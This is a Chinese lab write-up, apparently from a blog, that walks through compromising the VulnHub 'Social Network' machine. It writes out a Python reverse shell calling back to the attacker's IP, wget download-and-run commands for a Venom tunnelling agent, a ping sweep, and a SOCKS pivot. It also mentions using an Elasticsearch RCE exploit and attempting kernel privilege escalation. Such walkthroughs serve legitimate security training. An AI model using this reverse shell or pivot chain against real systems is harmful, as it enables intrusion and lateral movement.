VulnHub BOREDHACKERBLOG SOCIAL NETWORK

目录

1、配置网络

2、网络扫描

3、Web信息收集

4、Web 命令执行漏洞与反弹Shell

5、后渗透

5、挂SOCKS内网扫描

6、Linux内核提权


1、配置网络

下载靶机,用kali打开,网络配置为NAT如下:

2、网络扫描

寻找靶机IP,这里靶机IP在eth1网卡上:

查看开放端口,发现5000端口

识别5000端口开放的服务,发现他是基于python2开发的一个web服务

3、Web信息收集

用浏览器访问:

使用xss payload没有成功:

4、Web 命令执行漏洞与反弹Shell

使用dirsearch扫描敏感目录,发现存在/admin路径:

使用python反弹shell,发现代码可以执行成功:

首先在kali上监听4445端口

再用以下代码进行反弹shell

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.10.129",4445))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/sh","-i"]);

成功并发现是docker环境,输入ls /.dockerenv判断当前环境是否为docker容器:

发现是在docker环境下

5、后渗透

使用ip address发现内网网段

使用for i in $(seq 1 20); do ping -c 1 172.17.0.$i; done命令看内网存活主机,172.17.0.1-3为开放主机:

部署Venom内网穿透工具

在Kali主机Venom目录启动Python3 Http Server

启动Venom管理端,监听本地9999端口

靶机部署Venom客户端

wget -c http://192.168.10.129/agent_linux_x64

./agent_linux_x64 -rhost 192.168.10.129 -rport 9999

在Kali主机Venom管理端可以看到有主机上线,查看、控制Venom节点、启动socks隧道

5、挂SOCKS内网扫描

1.修改proxychains配置

vi /etc/proxychains4.conf

修改最后一行为:

socks5  127.0.0.1 1080

2.挂代理启动扫描,发现172.17.0.2存在9200端口

用浏览器访问9200端口,配置好代理才能打开

发现版本号为1.4.2,存在elasticsearch版本漏洞为rce漏洞CVE-2015-1427:

找到漏洞并复制到当前目录:

执行exp获得,找到密码并且解密:

因为之前探测开放了22端口,使用ssh远程登录1337hack登录成功:

6、Linux内核提权

1.uname -a 发现版本号对应漏洞:

2.移动到根目录:

3.gcc编译成exp:

4.靶机wget文件:

运行后发现靶机的系统上缺少所需版本的C库,所以exp无法运行,不是root也不能升级系统,也没有找到解决办法。。。。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值